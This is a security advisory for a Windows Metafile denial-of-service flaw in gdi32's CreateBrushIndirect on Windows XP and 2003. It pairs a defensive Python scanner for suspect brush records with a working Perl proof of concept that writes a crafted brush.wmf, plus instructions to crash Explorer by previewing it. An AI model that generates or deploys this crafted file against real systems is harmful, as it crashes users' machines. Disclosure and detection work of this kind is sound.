Description:
Yet another Windows Metafile (WMF) denial-of-service exploit.
Systems affected:
+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003
Tech info:
Page fault in gdi32!CreateBrushIndirect() caused by an invalid pointer access.
An incorrect (short) to (void*) sign extension is also present.
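A defensive check for the condition described under "Tech info", as an added example that is not part of the original advisory: it walks the records of a WMF file and flags META_CREATEBRUSHINDIRECT records whose brush style is not solid, null or hatched, or whose 16-bit hatch field is negative and would sign-extend into a high pointer value. The function names, the constructed samples and the 32-bit pointer width are assumptions, and the flagging rule is a heuristic inferred from the advisory, not a vendor-confirmed root cause.

```python
import struct

META_EOF = 0x0000
META_CREATEBRUSHINDIRECT = 0x02FC
PLAIN_STYLES = {0: "BS_SOLID", 1: "BS_NULL", 2: "BS_HATCHED"}  # hatch is never a pointer

def scan_wmf(data):
    """Walk the records of a WMF byte string and return a list of findings."""
    # An optional 22-byte placeable header (magic 0x9AC6CDD7) precedes the 18-byte header.
    off = 22 if data[:4] == b"\xd7\xcd\xc6\x9a" else 0
    if len(data) < off + 18 or struct.unpack_from("<H", data, off + 2)[0] != 9:
        return ["not a WMF header"]
    off += 18
    findings = []
    while off + 6 <= len(data):
        words, func = struct.unpack_from("<IH", data, off)  # size in 16-bit words, function
        if words < 3 or off + words * 2 > len(data):
            findings.append(f"{off:#x}: bad record size {words}")
            break
        if func == META_CREATEBRUSHINDIRECT and words >= 7:
            style, _color = struct.unpack_from("<HI", data, off + 6)
            hatch = struct.unpack_from("<h", data, off + 12)[0]  # read as signed short
            if style not in PLAIN_STYLES:
                findings.append(f"{off:#x}: brush style {style} is not solid/null/hatched")
            if hatch < 0:
                # Value a (short) -> 32-bit pointer sign extension would produce (assumed width).
                findings.append(f"{off:#x}: hatch sign-extends to {hatch & 0xFFFFFFFF:#010x}")
        if func == META_EOF:
            break
        off += words * 2
    return findings

def build_wmf(records):
    """Constructed sample builder: records is a list of (function, parameter bytes)."""
    body = b"".join(struct.pack("<IH", 3 + len(p) // 2, f) + p for f, p in records)
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, 9 + len(body) // 2, 1, 8, 0)
    return header + body

# Constructed samples, kept in memory only. LogBrush layout: style, colour, hatch.
BENIGN = build_wmf([(META_CREATEBRUSHINDIRECT, struct.pack("<HIH", 0, 0x00FF0000, 0)),
                    (META_EOF, b"")])
SUSPECT = build_wmf([(META_CREATEBRUSHINDIRECT, struct.pack("<HIH", 6, 0, 0x8001)),
                     (META_EOF, b"")])

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_wmf(sample))
```

A scanner like this can run on a mail or web gateway before files reach a host that previews them; an empty list means no record matched the heuristic, not that the file is safe.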
Exploit:
=== begin of brush.pl ===
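#!/usr/bin/perl
# Writes a 68-byte WMF file: header, then CreateBrushIndirect (0x02FC),
# CreatePenIndirect (0x02FA), CreateBrushIndirect (0x02FC) and EOF records.
print "\nWMF PoC denial of service exploit by cyanid-E <[email\@protected]>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
binmode(WMF);  # write raw bytes, no newline translation
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";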
=== end of brush.pl ===
Just run brush.pl and try to preview brush.wmf (or even browse the folder
containing brush.wmf in Windows Explorer).
Discovered:
06/24/2006; vendor informed but has not answered